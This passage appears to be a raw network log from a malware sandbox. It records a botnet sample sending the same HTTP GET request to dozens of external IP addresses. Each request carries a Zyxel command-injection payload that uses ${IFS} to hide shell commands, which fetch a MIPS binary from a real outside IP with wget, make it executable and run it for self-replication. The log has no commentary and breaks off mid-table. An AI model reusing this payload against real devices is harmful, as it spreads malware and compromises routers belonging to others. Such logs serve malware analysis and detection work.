                                    Jan 13, 2024 19:02:19.849827051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    826192.168.2.135069658.72.100.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849873066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    827192.168.2.1340608120.218.172.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849908113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    828192.168.2.135544018.116.4.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849920034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    829192.168.2.133285024.187.178.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849987984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    830192.168.2.133898476.207.227.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850013018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    831192.168.2.1343090109.194.160.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850070000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    832192.168.2.1357884210.31.102.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850106955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    833192.168.2.1334594129.108.66.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850128889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    834192.168.2.133561887.121.94.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850192070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    835192.168.2.1344948145.176.124.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850213051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    836192.168.2.1340356106.200.98.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850269079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    837192.168.2.1337660175.126.163.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850305080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    838192.168.2.134021891.163.7.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850337029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    839192.168.2.1339568147.44.167.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850403070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    840192.168.2.1336230151.108.34.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850418091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    841192.168.2.1350744166.24.115.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850461006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    842192.168.2.135410479.52.101.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850496054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    843192.168.2.133969641.115.23.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850528955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    844192.168.2.135332251.255.42.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850553036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    845192.168.2.1347032123.112.225.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850595951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    846192.168.2.1355196126.1.133.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850626945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    847192.168.2.134045041.10.250.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850686073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    848192.168.2.1344294119.117.12.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850720882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    849192.168.2.1341176203.135.104.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850763083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    850192.168.2.1340226201.48.74.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850791931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    851192.168.2.1333754157.181.209.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850847006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    852192.168.2.133884678.28.148.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850887060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    853192.168.2.135850640.26.219.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850929976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    854192.168.2.136049089.75.43.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850965023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    855192.168.2.1349548201.170.242.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.850995064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    856192.168.2.135349091.247.235.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851042986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    857192.168.2.134669279.65.132.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851069927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    858192.168.2.1357576122.126.245.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851125002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    859192.168.2.1357168208.141.133.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851142883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    860192.168.2.134151237.11.217.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851193905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    861192.168.2.135122067.23.69.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851233959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    862192.168.2.1339176110.201.195.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851265907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    863192.168.2.134931651.84.178.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851294994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    864192.168.2.133701025.228.119.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851349115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    865192.168.2.135032247.226.81.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851373911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    866192.168.2.135697444.204.185.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851419926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    867192.168.2.1333448136.150.83.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851454973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    868192.168.2.1351260160.139.127.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851511002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    869192.168.2.1354692223.213.201.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851551056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    870192.168.2.136089065.207.66.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851592064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    871192.168.2.135745047.167.182.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851640940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    872192.168.2.134185286.150.166.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851653099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    873192.168.2.1352788167.122.177.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851667881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    874192.168.2.1346258201.170.44.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851730108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    875192.168.2.133740423.87.144.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851758003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    876192.168.2.1341980212.49.115.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851790905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    877192.168.2.1357092111.245.120.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851824999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    878192.168.2.13386522.247.86.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851882935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    879192.168.2.135900864.89.230.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851922035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    880192.168.2.133610072.201.177.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.851968050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    881192.168.2.1333062218.83.71.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852000952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    882192.168.2.1338508164.181.53.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852034092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    883192.168.2.1356240116.235.85.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852077007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    884192.168.2.1337410201.172.143.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852099895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    885192.168.2.133313487.250.217.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852133989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    886192.168.2.1346588133.21.193.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852181911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    887192.168.2.1334192176.49.116.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852226019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    888192.168.2.1357154114.161.116.26443
                                    TimestampBytes transferredDirectionData
